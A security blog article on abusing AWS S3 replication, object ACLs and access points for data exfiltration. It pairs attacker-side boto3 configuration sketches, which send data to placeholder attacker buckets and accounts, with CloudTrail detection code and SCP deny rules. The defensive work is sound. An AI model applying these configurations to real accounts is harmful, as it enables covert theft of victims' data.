Data exfiltration with native AWS S3 features
Over the last few years, malicious actors have turned to pairing data exfiltration with ransomware (so-called 'double extortion' attacks) to increase the likelihood of getting paid by their victims. The frequency of attacks featuring legitimate initial access also reinforces the need for robust internal detections of suspicious behaviour from valid credentials. With that in mind, this article is the result of spending some time understanding different options for abusing legitimate S3 features with the end goal of data exfiltration. The intent of deep-diving into these features was to better understand the shortcomings of native AWS logging and monitoring tooling, and to offer some suggestions for detecting their use and abuse.
S3 data replication
S3 data replication provides the ability to copy objects to another bucket, which can be useful from an enterprise logging, integration or security perspective. Replication can target buckets in the same account or in an unrelated account. The abuse potential lies in a malicious actor applying a replication policy that copies objects to an attacker-controlled bucket. Objects will continue to be replicated for as long as the policy is in place, presenting a convenient stream of backdoored data to the attacker.
Cross-account replication is relatively straightforward to set up, requiring a role assumable by S3 with replication and list/get permissions, and a configured bucket policy on the attacker-controlled account. Unfortunately, a newly configured replication policy is not reported on by IAM Access Analyzer, presumably because Access Analyzer focuses on objects being shared, as distinct from new copies of the objects being distributed.
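To make the moving parts concrete, the following is a minimal sketch of the replication configuration an attacker would apply via PutBucketReplication. The bucket names, role ARN and account ID are hypothetical placeholders.

```python
# Sketch of the ReplicationConfiguration payload passed to
# s3:PutBucketReplication. All ARNs and account IDs are hypothetical.

def build_replication_config(role_arn, dest_bucket_arn, dest_account_id):
    """Build the ReplicationConfiguration for put_bucket_replication."""
    return {
        # role assumable by s3.amazonaws.com with list/get on the source
        "Role": role_arn,
        "Rules": [
            {
                "ID": "exfil-rule",
                "Priority": 1,
                "Status": "Enabled",
                "Filter": {},  # empty filter: replicate every new object
                "DeleteMarkerReplication": {"Status": "Disabled"},
                "Destination": {
                    "Bucket": dest_bucket_arn,
                    "Account": dest_account_id,  # attacker-controlled account
                },
            }
        ],
    }

config = build_replication_config(
    "arn:aws:iam::111111111111:role/replication-role",
    "arn:aws:s3:::attacker-bucket",
    "999999999999",
)
# Applied with: boto3.client("s3").put_bucket_replication(
#     Bucket="victim-bucket", ReplicationConfiguration=config)
```

Note that this only replicates objects written after the policy is applied; replicating pre-existing objects requires the Batch Operations job discussed below.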
Abuse of legitimate functionality can be challenging to detect, particularly given the limited visibility afforded. Options for defenders are to keep a watchful eye for:
- Unknown PutBucketReplication or CreateJob events in the CloudTrail management trail. The CreateJob event is generated when an S3 Batch Operations job has been created, indicating that all existing objects in a bucket are being replicated across, as opposed to only future objects.
- Unknown PutBucketVersioning events (a prerequisite of bucket replication) on existing S3 buckets, recorded by the CloudTrail management trail.
- When an encrypted object is replicated, KMS Decrypt/Encrypt events will appear in the CloudTrail management trail, with a principalId and STS assumed role prefixed with s3-replication. Encryption events referencing KMS keys outside your known AWS accounts or ecosystems are of particular interest, as they reference the key being used in the destination account. At minimum, the IAM role carrying out the replication will require permission to use the KMS key that encrypts the objects in the source bucket. Key policy modification events (PutKeyPolicy) may indicate an attempt to fulfil some of the replication prerequisites.
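The indicators above can be sketched as a simple filter over CloudTrail management events. Field names follow the standard CloudTrail record format; the list of known accounts is an assumption you would replace with your own inventory.

```python
# Minimal sketch of a CloudTrail management-event filter for the
# replication indicators discussed above. KNOWN_ACCOUNTS is a
# hypothetical placeholder for your real account inventory.

SUSPICIOUS_EVENTS = {
    "PutBucketReplication",
    "PutBucketVersioning",
    "CreateJob",
    "PutKeyPolicy",
}
KNOWN_ACCOUNTS = {"111111111111"}

def flag_event(event):
    """Return a reason string if the event warrants review, else None."""
    name = event.get("eventName")
    if name in SUSPICIOUS_EVENTS:
        return f"review: {name}"
    # KMS usage by a principal prefixed with s3-replication against a key
    # outside known accounts suggests encryption in a foreign destination.
    principal = event.get("userIdentity", {}).get("principalId", "")
    if name in {"Encrypt", "Decrypt"} and "s3-replication" in principal:
        for resource in event.get("resources", []):
            if resource.get("accountId") not in KNOWN_ACCOUNTS:
                return "review: KMS usage against key outside known accounts"
    return None
```

In practice you would suppress findings for known replication pipelines rather than alert on every PutBucketReplication event.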
Defenders can use SCPs to control usage of S3 object replication in an account (Deny s3:PutBucketReplication), outright denying it or only allowing specific use cases. Failing that, detections based on anomalous usage or modification outside known pipelines are also an option.
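As a sketch, an SCP along the following lines denies replication configuration except for an approved pipeline role (the role name pattern is a hypothetical placeholder):

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "DenyBucketReplication",
      "Effect": "Deny",
      "Action": "s3:PutBucketReplication",
      "Resource": "*",
      "Condition": {
        "ArnNotLike": {
          "aws:PrincipalArn": "arn:aws:iam::*:role/approved-replication-*"
        }
      }
    }
  ]
}
```

Dropping the Condition block denies replication configuration outright.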
Object ACLs
Access Control Lists (ACLs) are a means through which object-level permissions can be delegated to different groups of users, accounts or anonymous (public) users. AWS has taken steps to reduce their use, with ACLs slated to be disabled by default for new buckets from April 2023. Where ACLs are not disabled for an S3 bucket, they can be applied at the bucket or object level. It is the object ACLs that are arguably the stealthier of the two.
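For reference, this is the shape of an object-level ACL grant to another account's canonical user, as passed to PutObjectAcl. Both IDs below are hypothetical stand-ins for the 64-character canonical IDs AWS actually uses.

```python
# Shape of an object-level ACL grant to another account, as passed to
# s3:PutObjectAcl. The IDs are hypothetical 64-character canonical IDs,
# not account IDs -- which is part of what makes attribution hard.

access_control_policy = {
    "Owner": {"ID": "a" * 64},  # canonical ID of the object owner (victim)
    "Grants": [
        {
            "Grantee": {
                "Type": "CanonicalUser",
                "ID": "b" * 64,  # canonical ID of the attacker's account
            },
            "Permission": "READ",  # grantee can now GetObject
        }
    ],
}
# Applied per object with: boto3.client("s3").put_object_acl(
#     Bucket="victim-bucket", Key="secret.txt",
#     AccessControlPolicy=access_control_policy)
```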
There are a few factors that make object-level ACLs difficult to detect:
- When assigning permissions to another account via an ACL (Account grantee), a long alphanumeric string called a canonical ID is used, as opposed to an account ID. From a detection perspective, understanding whether objects have been shared outside your organisation is difficult without maintaining a list of known canonical IDs.
- As the action is characterised as an object-level operation, the event (PutObjectAcl) does not appear in the CloudTrail management event stream. Administrators will need to configure CloudTrail data events with S3 write events enabled in order to log these events. The pricing implications of data trails can lead to trade-off discussions, where some accounts may not have all data event types enabled.
- The sharing of individual objects outside an account boundary (as distinct from the whole bucket) is not captured by IAM Access Analyzer.
Object-level ACLs toe the line between management- and data-plane events, and so create some difficulties in how changes to their permissions are recorded. Block Public Access functionality will override the ability of actors to designate anonymous or authenticated AWS users as ACL grantees, but the sharing of objects with a specific user or account is still feasible. Mitigating these techniques entirely relies on restricting the use of ACLs in S3 buckets or on utilising customer-managed KMS keys governed by least-privilege principles. Where object-level permissions are still needed, these types of activities can be alerted on by detecting:
- ACLs referencing unknown canonical IDs, URIs or email grantees.
- Unusual levels of PutObjectAcl calls. Given that each object requires a separate API call, a large number may indicate a mass exfiltration attempt.
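Both detections can be sketched as a pass over S3 data events. The event structure here is simplified for illustration (real PutObjectAcl data events nest the grant list more deeply), and the known-ID set and volume threshold are assumptions to tune for your environment.

```python
from collections import Counter

# Sketch of the two ACL detections above, run over S3 data events.
# KNOWN_CANONICAL_IDS and VOLUME_THRESHOLD are hypothetical placeholders;
# the requestParameters shape is simplified relative to real CloudTrail.

KNOWN_CANONICAL_IDS = {"a" * 64}
VOLUME_THRESHOLD = 100  # PutObjectAcl calls per principal per window

def review_put_object_acl(events):
    """Return a list of finding strings from a batch of data events."""
    findings = []
    calls_per_principal = Counter()
    for event in events:
        if event.get("eventName") != "PutObjectAcl":
            continue
        principal = event.get("userIdentity", {}).get("arn", "unknown")
        calls_per_principal[principal] += 1
        policy = event.get("requestParameters", {}).get("AccessControlPolicy", {})
        for grant in policy.get("Grants", []):
            grantee = grant.get("Grantee", {})
            if grantee.get("ID") and grantee["ID"] not in KNOWN_CANONICAL_IDS:
                findings.append("unknown canonical ID grantee: " + grantee["ID"][:8])
            if grantee.get("URI") or grantee.get("EmailAddress"):
                findings.append("URI or email grantee in object ACL")
    for principal, count in calls_per_principal.items():
        if count > VOLUME_THRESHOLD:
            findings.append(f"high PutObjectAcl volume from {principal}: {count}")
    return findings
```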
S3 Access Points
S3 Access Points are a relatively new feature that enables users to scope a particular entry point for interaction with S3 objects. This is particularly helpful where there is a requirement for distinct access policies and network controls for prefixes within an S3 bucket. Access points can be configured to allow traffic from the internet, or restricted to a specific VPC.
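A minimal sketch of the CreateAccessPoint request an attacker could use to stand up a VPC-scoped entry point into a victim bucket. The account ID, bucket and VPC ID are hypothetical placeholders.

```python
# Sketch of the kwargs for s3control.create_access_point(). The account
# ID, bucket name and VPC ID are hypothetical placeholders.

def build_access_point_request(account_id, bucket, vpc_id=None):
    """Build kwargs for boto3.client("s3control").create_access_point()."""
    request = {
        "AccountId": account_id,
        "Name": "quiet-entry-point",
        "Bucket": bucket,
    }
    if vpc_id:
        # Restricts the access point's network origin to a single VPC --
        # which need not belong to the bucket owner's account.
        request["VpcConfiguration"] = {"VpcId": vpc_id}
    return request

request = build_access_point_request("111111111111", "victim-bucket", "vpc-0a1b2c3d")
# Applied with: boto3.client("s3control").create_access_point(**request)
```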
Unfortunately, configuring an access point that references a VPC outside your account does not appear to generate an IAM Access Analyzer finding. Additionally, object-level API actions taken through S3 access points fall under their own CloudTrail data event category (S3 Access Point), not intuitively under S3 as some may assume. The impact is that those not selecting all data event categories may be left blind to this vector.
There are a few options, albeit limited, that you can look for:
- Creation of an S3 access point generates a CreateAccessPoint event in the CloudTrail management trail. Monitor these events, paying particular attention to any referencing an unknown VPC ID.
- One configuration option for access points is to delegate the management of object permissions to the access point, as opposed to the bucket policy. Modifications to bucket policies (PutBucketPolicy) referencing conditions like s3:DataAccessPointAccount, s3:DataAccessPointArn or s3:AccessPointNetworkOrigin may indicate this intention.
- Monitoring of CloudTrail data events with the S3 Access Point data event type enabled. Of particular interest would be abnormal downloads of S3 objects from IPs outside your known ranges.
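The bucket-policy inspection above can be sketched as a scan of policy documents for the access-point condition keys. The sample policy in the test is hypothetical.

```python
import json

# Sketch of the PutBucketPolicy inspection described above: flag bucket
# policies whose conditions reference the S3 access-point condition keys,
# indicating permission decisions are being delegated to access points.

ACCESS_POINT_CONDITION_KEYS = {
    "s3:DataAccessPointAccount",
    "s3:DataAccessPointArn",
    "s3:AccessPointNetworkOrigin",
}

def references_access_point(policy_document):
    """Return True if any statement condition uses an access-point key."""
    policy = json.loads(policy_document)
    for statement in policy.get("Statement", []):
        # Condition maps operators (e.g. StringEquals) to key/value pairs.
        for operator_block in statement.get("Condition", {}).values():
            if ACCESS_POINT_CONDITION_KEYS & set(operator_block):
                return True
    return False
```

The same check can be run against the requestParameters of PutBucketPolicy CloudTrail events to catch the change as it happens.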
Where S3 access points are not required in your accounts, it may be easier to disable their creation via SCPs (Deny s3:CreateAccessPoint).
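A sketch of such an SCP, covering both standard and Object Lambda access point creation:

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "DenyAccessPointCreation",
      "Effect": "Deny",
      "Action": [
        "s3:CreateAccessPoint",
        "s3:CreateAccessPointForObjectLambda"
      ],
      "Resource": "*"
    }
  ]
}
```

As with the replication SCP, a Condition block on aws:PrincipalArn can carve out exceptions for approved roles.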
In Summary
AWS has built one of the most flexible platforms of the major cloud providers. The trade-off of a feature-rich platform is a challenging, dynamic ecosystem in which defenders need to continually evaluate and react to changing conditions and TTPs. The features above represent only a small cross-section of the techniques available to attackers, and reiterate the need for defenders to think offensively. Hopefully this article has inspired some new detections that you can implement in your own environment.
If you’ve made it this far, thanks for coming along for the journey. If you have any feedback related to my writing style or content, I’d be all ears. You can find me on twitter at @masterofnone02 or masterofnone@infosec.exchange on Mastodon.